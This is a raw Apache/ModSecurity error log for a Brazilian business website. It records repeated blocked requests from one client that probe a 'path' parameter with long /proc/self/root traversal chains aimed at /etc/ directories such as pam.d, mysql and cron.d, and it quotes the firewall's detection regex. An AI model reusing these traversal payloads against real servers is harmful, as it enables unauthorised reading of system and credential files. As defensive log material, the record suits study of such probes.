[Fri Mar 20 12:29:04.630213 2026] [:error] [pid 9818:tid 140411540502272] [client 74.7.241.31:47746] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nwF1pVZ5mVmJwsFNn4wAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:05.871543 2026] [:error] [pid 11642:tid 140411632822016] [client 74.7.241.31:47748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nwbninkcc-iUj5AqU3wAAA40"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:08.317985 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.241.31:47764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nxF1pVZ5mVmJwsFNn6QAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:09.755213 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.241.31:47764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nxV1pVZ5mVmJwsFNn6wAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:11.120184 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.241.31:52848] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nx7ninkcc-iUj5AqU4gAAA4k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:12.487394 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:52862] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nyNa6ubjKNq_cu4YXSwAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:13.771146 2026] [:error] [pid 10189:tid 140411683178240] [client 74.7.241.31:52874] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nyTJ3M9BSuKP7CAZkDQAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:15.054651 2026] [:error] [pid 11642:tid 140411649607424] [client 74.7.241.31:52888] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ny7ninkcc-iUj5AqU4wAAA4s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:17.396165 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.241.31:52904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nzfqxLDW4GITHUkQk8gAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:18.659545 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:50488] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nzuoXxyEfFpUF8f-5mQAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:20.002167 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.241.31:50490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n0PXLqtnMIWvjpaLXAQAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:21.234158 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:50494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n0eoXxyEfFpUF8f-5mwAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:22.615434 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.241.31:50502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n0vXLqtnMIWvjpaLXBAAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:23.910753 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.241.31:50504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n0wF0L0L-SsrnPo6hsgAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:25.222030 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.241.31:50508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n1fXLqtnMIWvjpaLXCQAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:26.595027 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.241.31:50518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n1vXLqtnMIWvjpaLXCwAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:27.897982 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.241.31:37952] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n1wF0L0L-SsrnPo6htwAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:29.183466 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.241.31:37960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n2fXLqtnMIWvjpaLXDgAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:30.482685 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.241.31:37972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n2vXLqtnMIWvjpaLXEQAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:31.787042 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.241.31:37982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n2xCii7xarUs8iHakrgAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:33.100267 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:37990] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n3eoXxyEfFpUF8f-5nQAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:34.403511 2026] [:error] [pid 11642:tid 140411599251200] [client 74.7.241.31:38000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n3rninkcc-iUj5AqU7QAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:35.780265 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:38008] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 